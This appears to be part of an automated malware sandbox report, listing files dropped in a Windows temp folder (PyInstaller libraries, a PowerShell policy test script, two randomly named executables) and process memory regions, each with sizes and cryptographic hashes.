                              • C:\Users\Admin\AppData\Local\Temp\_MEI37602\select.pyd

                                Filesize

                                29KB

                                MD5

                                92b440ca45447ec33e884752e4c65b07

                                SHA1

                                5477e21bb511cc33c988140521a4f8c11a427bcc

                                SHA256

                                680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3

                                SHA512

                                40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

                              • C:\Users\Admin\AppData\Local\Temp\_MEI37602\sqlite3.dll

                                Filesize

                                1.5MB

                                MD5

                                612fc8a817c5faa9cb5e89b0d4096216

                                SHA1

                                c8189cbb846f9a77f1ae67f3bd6b71b6363b9562

                                SHA256

                                7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49

                                SHA512

                                8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237

                              • C:\Users\Admin\AppData\Local\Temp\_MEI37602\unicodedata.pyd

                                Filesize

                                1.1MB

                                MD5

                                16be9a6f941f1a2cb6b5fca766309b2c

                                SHA1

                                17b23ae0e6a11d5b8159c748073e36a936f3316a

                                SHA256

                                10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04

                                SHA512

                                64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igrjftca.hmv.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Users\Admin\AppData\Local\Temp\dglkpd.exe

                                Filesize

                                229KB

                                MD5

                                f94e3703ca371767d93f5a88b74fbee7

                                SHA1

                                80530e8ffb3fc7d2c36e339b70bcae0d0014b7f5

                                SHA256

                                954af7a9095306263dce0c4d05eda925de49041ad6ea7c37a23fed8cbc97f1d7

                                SHA512

                                ca0ba2f5a26a26eeb0e15a5b99be937b7d695411f043b1629ef10f7106f26a1096229f763b0ab86796d8f37efc62f469e399206d7a8c706e4043112269f01066

                              • C:\Users\Admin\AppData\Local\Temp\vvqujg.exe

                                Filesize

                                10.2MB

                                MD5

                                af38680351a15c428ec9a61c008e6104

                                SHA1

                                57781afb1a13c8168518acdb725a46963b70103b

                                SHA256

                                0db881c078ae2a62ef4178e098d1089cfe71de1e8b504d92f9d6c672adbcb225

                                SHA512

                                66ef68046dfc212a75420b12fe9f4769dbfbef27b0574c9673267be6031ab21e285ccf07936a64a8e6d5333ea5f6a01e8d945c702cde8237cb427db78ef09f6f

                              • memory/1104-4-0x00007FFA10840000-0x00007FFA11301000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1104-18-0x00007FFA10840000-0x00007FFA11301000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1104-3-0x00007FFA10840000-0x00007FFA11301000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1104-10-0x0000012FBB5A0000-0x0000012FBB5C2000-memory.dmp

                                Filesize

                                136KB

                              • memory/1104-11-0x00007FFA10840000-0x00007FFA11301000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2544-2-0x00007FFA10840000-0x00007FFA11301000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2544-59-0x00007FFA10840000-0x00007FFA11301000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2544-1-0x0000000000B00000-0x0000000000B1C000-memory.dmp

                                Filesize

                                112KB

                              • memory/2544-0-0x00007FFA10843000-0x00007FFA10845000-memory.dmp

                                Filesize

                                8KB

                              • memory/3796-74-0x00000218EC3A0000-0x00000218EC3E0000-memory.dmp

                                Filesize

                                256KB

                              • memory/3796-198-0x00000218EEAE0000-0x00000218EEB56000-memory.dmp

                                Filesize

                                472KB

                              • memory/3796-224-0x00000218EEBF0000-0x00000218EEC0E000-memory.dmp

                                Filesize

                                120KB

                              • memory/3796-223-0x00000218EEB60000-0x00000218EEBB0000-memory.dmp

                                Filesize

                                320KB

                              • memory/3796-259-0x00000218EEA70000-0x00000218EEA7A000-memory.dmp

                                Filesize

                                40KB

                              • memory/3796-260-0x00000218EEAA0000-0x00000218EEAB2000-memory.dmp

                                Filesize

                                72KB